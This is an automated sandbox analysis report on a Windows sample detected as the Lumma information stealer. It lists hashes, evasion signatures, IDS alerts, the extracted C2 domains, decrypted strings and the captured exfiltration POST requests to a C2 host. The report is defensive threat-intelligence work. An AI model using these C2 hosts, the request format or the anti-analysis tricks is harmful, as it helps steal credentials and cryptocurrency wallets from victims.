Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532864
MD5:	aa925ed1e2cda721f6ad1197ebb068d3
SHA1:	d22eff8423c5f88848908e2d66df562bbd33df1e
SHA256:	2656845a7266c11e911d3c0549f7f859932c68bc4946bea997d504a013c9297b
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

file.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AA925ED1E2CDA721F6AD1197EBB068D3)

WerFault.exe (PID: 1816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1992 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1972 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["dissapoiznw.store", "clearancek.site", "mobbipenju.store", "spirittunek.store", "eaglepawnoy.store", "studennotediw.store", "bathdoomgaz.store", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:06.913358+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.206.204	443	TCP
2024-10-14T03:07:07.896768+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49706	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:06.913358+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49705	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:07.896768+0200	2049812	1	A Network Trojan was detected	192.168.2.5	49706	172.67.206.204	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.511402+0200	2056477	1	Domain Observed Used for C2 Detected	192.168.2.5	59412	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.451545+0200	2056471	1	Domain Observed Used for C2 Detected	192.168.2.5	65430	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.489517+0200	2056481	1	Domain Observed Used for C2 Detected	192.168.2.5	63495	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.478904+0200	2056483	1	Domain Observed Used for C2 Detected	192.168.2.5	59164	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.538425+0200	2056473	1	Domain Observed Used for C2 Detected	192.168.2.5	50693	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.466045+0200	2056485	1	Domain Observed Used for C2 Detected	192.168.2.5	49754	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.521967+0200	2056475	1	Domain Observed Used for C2 Detected	192.168.2.5	52261	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:04.500431+0200	2056479	1	Domain Observed Used for C2 Detected	192.168.2.5	65071	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T03:07:06.092766+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: file.exe.5040.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "clearancek.site", "mobbipenju.store", "spirittunek.store", "eaglepawnoy.store", "studennotediw.store", "bathdoomgaz.store", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: sergei-esenin.com	Virustotal: Detection: 17%	Perma Link
Source: spirittunek.store	Virustotal: Detection: 21%	Perma Link
Source: licendfilteo.site	Virustotal: Detection: 15%	Perma Link
Source: studennotediw.store	Virustotal: Detection: 17%	Perma Link
Source: eaglepawnoy.store	Virustotal: Detection: 18%	Perma Link
Source: bathdoomgaz.store	Virustotal: Detection: 21%	Perma Link
Source: mobbipenju.store	Virustotal: Detection: 21%	Perma Link
Source: dissapoiznw.store	Virustotal: Detection: 21%	Perma Link
Source: clearancek.site	Virustotal: Detection: 17%	Perma Link
Source: studennotediw.store	Virustotal: Detection: 17%	Perma Link
Source: eaglepawnoy.store	Virustotal: Detection: 18%	Perma Link
Source: dissapoiznw.store	Virustotal: Detection: 21%	Perma Link
Source: https://sergei-esenin.com:443/api	Virustotal: Detection: 18%	Perma Link
Source: https://sergei-esenin.com/pi	Virustotal: Detection: 14%	Perma Link
Source: bathdoomgaz.store	Virustotal: Detection: 21%	Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 41%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: licendfilteo.site
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: spirittunek.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bathdoomgaz.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: studennotediw.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: dissapoiznw.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: eaglepawnoy.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: mobbipenju.store
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_009499D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0090D110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0090D110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_0090FCA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00910EEC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00945700
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	0_2_00916F91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_009049A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	0_2_00943920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_0091D961
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00911ACD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_009142FC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00911A3C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_00905A50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00944A40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00913BE2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00911BEE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_0090A300
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_00949B60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	0_2_0092CCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0092CCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	0_2_0092CCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00949CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	0_2_00949CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	0_2_0091B410
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0091D457
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_0092C470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	0_2_00908590
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	0_2_0092FD10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00929510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00916536
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00911E93
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	0_2_0090BEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_00916EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00906EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	0_2_00916F91

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:52261 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:65071 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:50693 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:63495 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:49754 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:59412 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:65430 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:59164 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.204:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: dissapoiznw.store
Source: Malware configuration extractor	URLs: clearancek.site
Source: Malware configuration extractor	URLs: mobbipenju.store
Source: Malware configuration extractor	URLs: spirittunek.store
Source: Malware configuration extractor	URLs: eaglepawnoy.store
Source: Malware configuration extractor	URLs: studennotediw.store
Source: Malware configuration extractor	URLs: bathdoomgaz.store
Source: Malware configuration extractor	URLs: licendfilteo.site

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 172.67.206.204 172.67.206.204

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=A31cOGSCOICaT7wlGyZE7Q6paPS.P3SiUU5896xbzcc-1728868026-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4fbcd6a99d56aa7fbda5d435; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 14 Oct 2024 01:07:05 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ed.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https:/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: clearancek.site
Source: global traffic	DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic	DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic	DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic	DNS traffic detected: DNS query: studennotediw.store
Source: global traffic	DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic	DNS traffic detected: DNS query: spirittunek.store
Source: global traffic	DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
